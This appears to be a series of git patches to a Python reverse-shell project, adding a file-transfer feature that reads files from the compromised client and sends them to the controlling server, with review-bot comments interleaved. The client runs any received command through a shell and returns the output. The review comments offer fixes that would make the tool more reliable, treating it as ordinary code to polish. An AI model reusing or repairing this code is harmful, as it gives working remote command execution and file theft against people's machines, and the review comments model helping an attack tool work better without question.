From 9f7ebe530e8b7eef0be5d085864a4f2ca825c5f6 Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:07:51 +0100 Subject: [PATCH 1/4] Added reverse shell file transfer protocol Added reverse shell file transfer protocol --- Single_Client/client.py | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/Single_Client/client.py b/Single_Client/client.py index a1c8924..fa66b6c 100644 --- a/Single_Client/client.py +++ b/Single_Client/client.py @@ -1,6 +1,6 @@ import os import socket -import subprocess +import subprocess, time # Create a socket @@ -32,6 +32,22 @@ def receive_commands(): global s while True: data = s.recv(1024) + if data[:2].decode("utf-8") == "ft": + def send_file(file): + print(file) + name = file.split("/")[-1] + with open(file, "r") as f: + file = f.read() + buffer = str(len(file)) + server.send("#{0}#{1}".format(buffer, name).encode("utf-8")) + time.sleep(0.1) + server.send(file.encode("utf-8")) + while True: + file_name = server.recv(1024).decode("utf-8") + if file_name.split("#", 1)[0] == "(FT)": + file_name = file_name.split("#", 1)[1] + send_file(file_name) + break if data[:2].decode("utf-8") == 'cd': os.chdir(data[3:].decode("utf-8")) if len(data) > 0: From e68bca9f869408729aaba34b39858260c00f1d38 Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:09:30 +0100 Subject: [PATCH 2/4] Corrected some bad errors Corrected some bad errors --- Single_Client/client.py | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/Single_Client/client.py b/Single_Client/client.py index fa66b6c..4da8f47 100644 --- a/Single_Client/client.py +++ b/Single_Client/client.py 
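Review bot: The dispatch test `data[:2].decode("utf-8") == "ft"` in the added branch is a prefix match, so any command whose first two characters are `ft` is diverted into the transfer path instead of being handled as a command; compare the whole message, e.g. `if data == b"ft":`, which also avoids decoding a two-byte slice that may cut a multi-byte character. Separately, `buffer = str(len(file))` counts characters from a text-mode read while the bytes sent are `file.encode("utf-8")`, so the announced length is wrong for any non-ASCII content, and `open(file, "r")` has no handling for a missing or binary file. `send_file` is also redefined each time the branch runs and rebinds its own parameter `file` to the file contents; defining it once at module level with distinct names would read better. The body of `receive_commands` continues outside this hunk.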
@@ -48,14 +48,15 @@ def send_file(file): file_name = file_name.split("#", 1)[1] send_file(file_name) break - if data[:2].decode("utf-8") == 'cd': - os.chdir(data[3:].decode("utf-8")) - if len(data) > 0: - cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - output_bytes = cmd.stdout.read() + cmd.stderr.read() - output_str = str(output_bytes, "utf-8") - s.send(str.encode(output_str + str(os.getcwd()) + '> ')) - print(output_str) + else: + if data[:2].decode("utf-8") == 'cd': + os.chdir(data[3:].decode("utf-8")) + if len(data) > 0: + cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) + output_bytes = cmd.stdout.read() + cmd.stderr.read() + output_str = str(output_bytes, "utf-8") + s.send(str.encode(output_str + str(os.getcwd()) + '> ')) + print(output_str) s.close() From cd7c8e0f623c28301c2a58efb105a8bd3b29fd4a Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:11:21 +0100 Subject: [PATCH 3/4] Corrected socket variable name Corrected socket variable name --- Single_Client/client.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Single_Client/client.py b/Single_Client/client.py index 4da8f47..2f26590 100644 --- a/Single_Client/client.py +++ b/Single_Client/client.py @@ -39,9 +39,9 @@ def send_file(file): with open(file, "r") as f: file = f.read() buffer = str(len(file)) - server.send("#{0}#{1}".format(buffer, name).encode("utf-8")) + s.send("#{0}#{1}".format(buffer, name).encode("utf-8")) time.sleep(0.1) - server.send(file.encode("utf-8")) + s.send(file.encode("utf-8")) while True: file_name = server.recv(1024).decode("utf-8") if file_name.split("#", 1)[0] == "(FT)": From 68fa925d30c4bf9a12e490f31c18a341bd641abf Mon Sep 17 00:00:00 2001 
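Review bot: The re-indented block still guards only on `if len(data) > 0:`, so when the peer closes the connection and `recv` returns `b""` nothing leaves the loop, and the trailing `s.close()` appears unreachable; an `if not data: break` directly after the `recv` call would end it cleanly. The enclosing `while True:` and the `recv` are above this hunk, so the placement needs checking against the full file. In the same block, `cmd.stdout.read() + cmd.stderr.read()` drains the two pipes one after the other and can block if the child fills stderr first; `out, err = cmd.communicate()` reads both safely.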
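Review bot: The rename is incomplete: `file_name = server.recv(1024).decode("utf-8")`, two lines below the changed `send` calls, still uses `server`, which nothing visible in this file defines (the function declares `global s` and reads from `s`). As written, the transfer branch would raise `NameError` as soon as it is entered. It should read `file_name = s.recv(1024).decode("utf-8")`. The enclosing function begins above this hunk.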
From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:16:50 +0100 Subject: [PATCH 4/4] Addded reverse shell file transfer protocol Addded reverse shell file transfer protocol --- Single_Client/server.py | 40 ++++++++++++++++++++++++++++++++-------- 1 file changed, 32 insertions(+), 8 deletions(-) diff --git a/Single_Client/server.py b/Single_Client/server.py index 1acdd89..24440d2 100644 --- a/Single_Client/server.py +++ b/Single_Client/server.py @@ -41,14 +41,38 @@ def socket_accept(): def send_commands(conn): while True: cmd = input() - if cmd == 'quit': - conn.close() - s.close() - sys.exit() - if len(str.encode(cmd)) > 0: - conn.send(str.encode(cmd)) - client_response = str(conn.recv(1024), "utf-8") - print(client_response, end="") + if cmd == "download": + conn.send("ft".encode("utf-8")) + def recive_file(buffer): + while True: + bff = conn.recv(buffer).decode("utf-8") + break + if bff.startswith("#"): + buff = int(bff.split("#", 2)[1]) + name = bff.split("#", 2)[2] + while True: + file = conn.recv(buff).decode("utf-8") + break + with open(name, "w") as f: + f.write(file) + print(file) + return name + while True: + conn, addr = server.accept() + while True: + file_to_transfer = str(input("[!] File to transfer: ")) + file_to_transfer = "(FT)#" + file_to_transfer + conn.send(file_to_transfer.encode("utf-8")) + recive_file(1024) + else: + if cmd == 'quit': + conn.close() + s.close() + sys.exit() + if len(str.encode(cmd)) > 0: + conn.send(str.encode(cmd)) + client_response = str(conn.recv(1024), "utf-8") + print(client_response, end="") def main():
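Review bot: `recive_file` writes to `open(name, "w")` with `name` taken verbatim from the `#<len>#<name>` header the remote side sent, so the peer chooses where the file lands on the machine running server.py, including absolute paths and `../` sequences. Reduce it to a base name and write under a dedicated directory, e.g. `name = os.path.basename(bff.split("#", 2)[2])` (assuming `os` is imported in server.py, which this hunk does not show). The size is peer-controlled too: `buff = int(...)` goes straight into a single `conn.recv(buff)`, which neither bounds the request nor guarantees the whole payload arrived, and `int()` raises on a malformed header. `conn, addr = server.accept()` refers to `server` while the surrounding code closes `s`, and it rebinds the `conn` already passed in; it looks as if the existing connection should be reused. `send_commands` continues outside the hunk.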